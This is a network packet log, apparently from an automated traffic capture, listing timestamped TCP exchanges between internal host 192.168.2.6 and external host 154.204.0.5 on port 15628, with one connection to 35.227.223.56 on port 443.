Jul 20, 2024 16:31:46.778060913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.778318882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.783409119 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.784667015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.789647102 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.789726019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.794603109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.796616077 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.810427904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.810631990 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.816952944 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.817517996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.822453022 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.822593927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.828221083 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.828433990 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.833364964 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.833725929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.839574099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.839813948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.845541000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.846308947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.852790117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.852914095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.861208916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.864238977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.869560003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.869832993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.875921011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.876121044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.881134987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.881392956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.886538982 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.886713028 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.891815901 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.892256975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.897605896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.897859097 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.902904034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.903136969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.908622980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.908857107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.914382935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.916513920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.921469927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.921632051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.929579020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.929692984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.937038898 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.939743042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.945077896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.948503971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.954066992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.954308033 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.959429026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.960098982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.965922117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.966294050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.974224091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.974369049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.979988098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.980207920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.986799002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.986912012 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:46.992224932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:46.993287086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.007385969 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.007698059 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.013519049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.014039040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.032179117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.032372952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.037770987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.037899017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.044378042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.044569016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.054872990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.055087090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.062309980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.064759970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.070379972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.072022915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.079507113 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.080574989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.088427067 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.092304945 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.099008083 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.099805117 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.106040001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.106605053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.111910105 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.112509012 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.117855072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.119970083 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.126236916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.128525019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.176366091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.176742077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.177103043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.182010889 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.184011936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.188626051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.192502975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.198115110 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.200136900 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.205399036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.208547115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.214478970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.215974092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.222510099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.222605944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.228728056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.231997967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.237679958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.240526915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.245701075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.247941017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.253895998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.256515980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.261821985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.285376072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.290704012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.291812897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.300111055 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.304533958 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.312738895 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.316442966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.322659969 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.323801041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.331315994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.331635952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.338562965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.339715958 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.345767021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.348285913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.353702068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.355638981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.382296085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.384373903 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.384485960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.390443087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.391729116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.391926050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.397317886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.400141954 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.407798052 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.411838055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.434308052 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.436609030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.439853907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.466356993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.468683004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.471767902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.474140882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.474401951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.478122950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.479657888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.479851961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.485949993 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.487674952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.492566109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.492964029 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.498354912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.498419046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.510521889 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.510611057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.517127991 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.517190933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.528780937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.528845072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.535768032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.535876036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.540934086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.541033983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.546298981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.546359062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.551743984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.551826000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.557049036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.557125092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.563258886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.563329935 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.568365097 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.568471909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.570045948 CEST	49754	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:47.570075035 CEST	443	49754	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:47.573776960 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.573841095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.579370022 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.579433918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.585084915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.585148096 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.592786074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.592848063 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.597853899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.597963095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.602894068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.602983952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.607916117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.608036995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.613008022 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.615525961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.621896982 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.621967077 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.628134012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.628288031 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.633234024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.640242100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.645500898 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.645682096 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.653065920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.653193951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.658117056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.658282995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.663233042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.663781881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.669100046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.669239044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.679244995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.679439068 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.689589977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.706571102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.716912031 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.716974020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.722541094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.722595930 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.727778912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.727847099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.735594034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.735889912 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.742361069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.742429972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.748724937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.748776913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.753678083 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.753747940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.759394884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.759454966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.767745972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.767836094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.779304028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.779525042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.796464920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.796540022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.802114010 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.802196980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.808151960 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.808217049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.814670086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.814748049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.820363998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.820435047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.826870918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.826936960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.835284948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.835355043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.840537071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.840604067 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.845592976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.845689058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.850692034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.850771904 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.855926037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.856091022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.861057997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.861165047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.866065025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.866131067 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.873037100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.873339891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.882271051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.882400036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.887553930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.887634039 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.898436069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.898509979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.906898022 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.906997919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.912048101 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.912156105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.917474031 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.917547941 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.922893047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.922955036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.929081917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.929152966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.938152075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.938226938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.943443060 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.943517923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.948592901 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.948676109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.953713894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.953795910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.958838940 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.964613914 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.970920086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.970988989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.976118088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.976183891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.981477976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.981575966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.987806082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.987875938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.993158102 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.993223906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:47.998682022 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:47.998750925 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.003878117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.004069090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.008908987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.009008884 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.014461040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.014554024 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.019335032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.019449949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.024545908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.024667025 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.029654980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.029716015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.035202026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.035267115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.040335894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.040436983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.045536995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.045593977 CEST	49722	15628	192.168.2.6	154.204.0.5
